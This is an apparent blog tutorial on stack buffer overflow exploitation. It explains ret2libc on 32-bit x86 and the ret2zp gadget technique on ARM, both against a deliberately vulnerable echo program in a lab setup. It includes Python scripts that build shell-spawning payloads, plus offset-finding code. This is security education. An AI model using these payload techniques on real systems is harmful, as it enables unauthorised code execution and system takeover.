Demystifying "Return-to-Zero-Protection" on ARM

The security community is well versed in the x86 architecture, which has been around for several decades. ARM, in contrast, has received far less attention. As we move to smaller, portable devices, the use of ARM processors has proliferated. ARM is a natural choice because it is less power hungry than mainline x86 processors. Being power efficient doesn't mean it is less capable, however. High-end ARM processors are not only gentle on the battery but can also sustain compute-intensive workloads. This is made possible by several architectural choices that are beyond the scope of this post.

It thus makes sense to get acquainted with exploitation on ARM-based devices from both an attacker's and a defender's perspective. Being familiar with x86, we would naturally want to translate our existing knowledge to ARM. However, many x86 exploitation techniques don't map one-to-one to ARM. To bypass No Execute (NX), the Return-to-Libc (ret2libc) technique is often used on x86. In its classic form, this does not work on ARM. In this post, we are going to look into ret2libc and the reason why it fails on ARM. We will also look at Return-to-Zero-Protection (ret2zp) as an alternative that overcomes the limitations of ret2libc as applied to ARM systems.

Return-to-Libc: A primer

To keep things simple, we will turn off Address Space Layout Randomization (ASLR) for our exercises. This can be done by running

Disabling ASLR

Now consider the code below.

The source code

The buffer overflow bug in the do_echo function is obvious. The gets function reads input into a fixed-size buffer of 100 bytes. If we supply more than 100 bytes, we overflow the buffer, potentially overwriting other values on the stack. On x86, the return address is also stored on the stack, so it's possible to redirect execution to any point of our choice by overwriting the return address with a suitable value. Suppose we want to pop a shell. In this case, we can redirect execution to the system function in libc. The system function takes one parameter: a pointer to a null-terminated ASCII string denoting the command to execute.

On 32-bit x86, the calling convention mandates that function arguments be passed on the stack. In our case, when we hit system, it will expect the pointer to the command string to be on the stack as well. The buffer overflow bug already gives us control of the stack. It is thus a matter of crafting a proper string to satisfy all the constraints.

The code is compiled with the following flags. We are compiling for x86 as the target and that's why we specify the -m32 flag. The -fno-stack-protector disables the Stack Smashing Protection for simplicity.

Compiling the source

First, we need to find out which part of our input string overwrites the saved return address. We can use pwntools for generating a large string.

Using pwntools for generating a string

Next, debug the binary in gdb (gdb -q ./echo-x86). The disassembly of do_echo looks like this.

The disassembly of do_echo

We set a breakpoint on the last instruction of do_echo at 0x80484c1. Run the program and provide the pwntools generated string as input.

Feeding the pwntools string to our binary

We hit the breakpoint instantly.

Breakpoint is hit

We are paused on the ret instruction. This instruction pops a dword from the stack and transfers execution to that address. Register esp points to the top of the stack, 0xbffff18c. The topmost dword on the stack is "daab" (in ASCII). [Note: "daabeaab" is a qword and we only need the topmost dword.] The ret instruction will treat this as the return address and try to jump to it, which will crash the program. Now, we want to find the offset of "daab" in our input. Again, we use pwntools.

Finding the offset
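The pattern and the offset lookup can also be reproduced without pwntools. The sketch below assumes pwntools' default settings (lowercase alphabet, 4-character subsequences) and lazily generates the same kind of de Bruijn pattern. The names make_pattern and find_offset are chosen here for illustration and are not the pwntools API.

```python
import itertools
import string


def de_bruijn(alphabet, n):
    """Lazily yield a de Bruijn sequence over `alphabet`.

    Within the sequence, any run of n characters appears at most once,
    which is what lets us map a leaked chunk back to a unique offset.
    """
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def make_pattern(length, n=4):
    """Return the first `length` characters of the pattern."""
    return "".join(itertools.islice(de_bruijn(string.ascii_lowercase, n), length))


def find_offset(chunk, length=1000, n=4):
    """Return the offset of `chunk` in the pattern, or -1 if absent."""
    return make_pattern(length, n).find(chunk)


print(make_pattern(16))       # start of the pattern fed to the program
print(find_offset("daab"))    # offset of the dword that lands in the return address
```

Under these assumptions, find_offset("daab") evaluates to 112.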

"daab" is at an offset of 112. It means whatever we put at this offset will be treated as the return address. We want to jump to system, so lets find out its address.

Finding the address of system

This is the value we want to put at the specified offset. Next, we need the pointer to the string denoting the command to execute. Let's search for /bin/sh.

Finding the address of /bin/sh

/bin/sh is at 0xb7f649ab. That is all the information we need. Our exploit string will look something like this.

Layout of the exploit string

The first 112 bytes fill up the buffer. Then we put the address of system and, at the end, the address of the string "/bin/sh". In between, we put another value: the fake return address. What is its purpose? It is there because of the way function calls work on x86. The call instruction jumps to the specified address while pushing the return address on the stack. Thus, when we are within system, the topmost dword on the stack should be the return address, followed by the function arguments. We reach system through ret rather than call, so nothing pushes a return address for us and we must supply that slot ourselves. The return address doesn't matter in our case, so we can put any value here.

To generate the exploit string, we will use a Python script.

Generating the exploit
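A minimal sketch of how such a script might build the exploit string, using only the standard library. The offset and the "/bin/sh" address are the values found above. SYSTEM_ADDR is a hypothetical placeholder, since the real value has to be read from gdb on your own machine. Delivering the payload over the netcat connection is left out.

```python
import struct

OFFSET = 112               # offset of the saved return address, found above
SYSTEM_ADDR = 0xDEADBEEF   # HYPOTHETICAL placeholder: use the address gdb reports for system
FAKE_RET = 0x42424242      # arbitrary: where system would "return" to, which we don't care about
BINSH_ADDR = 0xB7F649AB    # address of "/bin/sh", found above


def p32(value):
    """Pack a 32-bit value in little-endian byte order, as x86 expects."""
    return struct.pack("<I", value)


def build_payload(system_addr=SYSTEM_ADDR, binsh_addr=BINSH_ADDR):
    payload = b"A" * OFFSET       # filler up to the saved return address
    payload += p32(system_addr)   # overwrites the return address: ret jumps to system
    payload += p32(FAKE_RET)      # slot system treats as its own return address
    payload += p32(binsh_addr)    # first (and only) argument to system
    return payload


payload = build_payload()
print(len(payload))
print(payload[OFFSET:].hex())
```

Because gets stops reading at a newline, none of the packed addresses may contain the byte 0x0a. If one does, a different address has to be chosen.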

To simulate the program running on a remote server we will use netcat. The Python script will connect to the specified port and send in the exploit string. As we see below, the exploit worked and we get a shell!

Ret2Libc exploit was successful

This exploitation method is known as Return-to-Libc. It is called so because we redirect execution to system, which is a function in libc. At the start of this post we mentioned that ret2libc is not possible on ARM, i.e. if we want to exploit the exact same program compiled for ARM, this technique won't work.

Why is Return-to-Libc not possible on ARM?

ARM is different from x86. In particular, on ARM the first four arguments to a function are passed in registers R0, R1, R2 and R3 respectively. Remaining arguments (if any) are passed on the stack, akin to x86. In ret2libc we redirected execution to the system function, which takes just a single parameter. The calling convention on ARM mandates that this argument be passed in R0. By exploiting a buffer overflow we only get control of the stack, not the registers. So while it's possible to redirect execution to system, we cannot set the value in R0. This makes ret2libc ineffective on ARM.

Introducing Return-to-Zero Protection

Although we cannot control the registers directly, which a successful ret2libc attack requires, we do have control of the return address. On ARM, the return address is stored in the Link Register (LR). The function prologue saves the value in LR on the stack, and the function epilogue restores it when the function is done executing. To make this clear, let's compile the same code for ARM within a Raspbian virtual machine. Hugsy, the author of GEF, has provided pre-configured VMs for several architectures including ARM. You can download the armv6-stretch VM from the Google Drive link to practice.

The echo.c file is compiled with the following flags on the Raspbian Virtual Machine.

Compiling for ARM

As before, disable ASLR. Running the binary in GDB (gdb-multiarch -q ./echo-arm), the assembly code for do_echo looks like this.

Disassembly of do_echo on ARM

The first instruction at 104c8 pushes the value in the Link Register (LR) on the stack. LR stores the return address. Near the end of the function, at 104f4, the saved return address is restored into the Program Counter (PC), which has the same effect as jumping back to the caller. As with ret2libc, we can overflow the stack buffer and overwrite the saved return address. However, this alone doesn't give us control of the registers.

In this case, instead of redirecting execution to system directly, we jump to another location: a series of instructions (a gadget) that loads values from the stack into registers. Thus, in an indirect way, we gain control of the registers.

If we look at the disassembly of lrand48 which is a libc function, the series of instructions from 0xb6ea2fd4 loads register R0 from the stack, increments the stack pointer by 12 before popping a dword and jumping to it. This is exactly what we require. The ldr r0, [sp, #4] instruction gives us control of register R0 and pop {pc} allows us to redirect execution to system after executing this gadget.

The disassembly of lrand48
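To see why this gadget is useful, its effect can be modelled on a toy stack. The sketch below treats the stack as a list of 32-bit words and assumes the middle instruction is an add sp, sp, #12 (the text above only says that the stack pointer is incremented by 12). BINSH and SYSTEM are hypothetical stand-ins, not real addresses.

```python
def run_gadget(stack, sp=0):
    """Model the lrand48 gadget on a stack given as a list of 32-bit words.

    `sp` is an index into the list, so one step equals 4 bytes.
    Returns (r0, pc, sp) as they would be after the gadget has run.
    """
    r0 = stack[sp + 1]   # ldr r0, [sp, #4]  -> second word on the stack goes to R0
    sp += 3              # add sp, sp, #12   -> skip three words (assumed encoding)
    pc = stack[sp]       # pop {pc}          -> fourth word becomes the new PC
    sp += 1
    return r0, pc, sp


BINSH = 0x11111111    # HYPOTHETICAL stand-in for the address of "/bin/sh"
SYSTEM = 0x22222222   # HYPOTHETICAL stand-in for the address of system

# What the attacker places on the stack right after the gadget's own address.
stack = [0x41414141, BINSH, 0x41414141, SYSTEM]

r0, pc, sp = run_gadget(stack)
print(hex(r0), hex(pc))
```

With this layout, R0 ends up holding the "/bin/sh" stand-in and PC the system stand-in, which is exactly the state a normal call to system would have.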

Hence we need to craft the exploit string so that execution jumps to this gadget first, which sets R0 to the address of the string "/bin/sh". The required addresses can be found in gdb while debugging the binary.

Address of system and "/bin/sh"

Debug the program using gdbserver on the Raspbian VM and connect to it from the host using gdb-multiarch. Now, let us set a breakpoint at the last instruction of do_echo at 0x104f4. This is for finding the offset of the part of the input which will overwrite the return address.

Disassembly of do_echo for the echo-arm binary

Back in the Raspbian VM, provide a pwntools-generated string as the input.

Feeding a pwntools generated string

The breakpoint will be hit as shown below.

Overwriting the PC

Now let's inspect the stack. The pop {r11, pc} instruction will load "zaab" and "baab" into registers R11 and PC respectively. "baab" overwrites the saved return address. Using pwntools, we can find the offset as we did before.

Finding the offset

The dword at an offset of 104 will overwrite the return address. We can now write a Python script to generate the exploit string.

The code for ret2zp

The first 104 bytes are for filling up the buffer. Then we put the address of the gadget in lrand48. This is where execution will initially go. The gadget will load R0 with the dword at [sp + 4], hence we need to put a 4 byte placeholder to adjust for this before putting in the address of "/bin/sh". Next, the stack pointer is incremented by 12. To compensate for this, we need to put in another 4 byte filler before finally putting in the address of system.
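The layout just described can be sketched with the standard library alone. The offset and the gadget address are the values given above. BINSH_ADDR and SYSTEM_ADDR are hypothetical placeholders to be replaced with the addresses gdb reports, and little-endian ARM is assumed.

```python
import struct

OFFSET = 104               # offset of the saved return address, found above
GADGET_ADDR = 0xB6EA2FD4   # gadget inside lrand48, from the disassembly above
BINSH_ADDR = 0xCAFEBABE    # HYPOTHETICAL placeholder for the address of "/bin/sh"
SYSTEM_ADDR = 0xDEADBEEF   # HYPOTHETICAL placeholder for the address of system
FILLER = b"BBBB"           # 4-byte placeholder, its value is never used


def p32(value):
    """Pack a 32-bit value in little-endian byte order."""
    return struct.pack("<I", value)


def build_ret2zp_payload(gadget=GADGET_ADDR, binsh=BINSH_ADDR, system=SYSTEM_ADDR):
    payload = b"A" * OFFSET   # fills the buffer; the last 4 bytes land in R11
    payload += p32(gadget)    # popped into PC by pop {r11, pc}
    payload += FILLER         # [sp + 0]:  skipped by the gadget
    payload += p32(binsh)     # [sp + 4]:  loaded into R0
    payload += FILLER         # [sp + 8]:  skipped when sp is advanced by 12
    payload += p32(system)    # [sp + 12]: popped into PC by pop {pc}
    return payload


payload = build_ret2zp_payload()
print(len(payload))
print(payload[OFFSET:].hex())
```

As with the x86 payload, the bytes pass through gets, so none of the packed addresses may contain 0x0a.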

Just as before, we use netcat to simulate a remote server and run the binary. Back on our host, running exploit.py gives us a shell.

Ret2zp exploit was successful

This is how the Return-to-Zero Protection technique works. In short, it is similar to ret2libc, but it's a two-step process: we first redirect execution to a gadget that gives us control of the registers, and only then jump to system.

That's all for this blog post. Finally, I would like to add that we have recently launched a video-based training course on ARM exploitation where you can learn and understand techniques like this one. If you are interested, I highly recommend giving it a try. If you have any questions, feel free to leave a comment below.
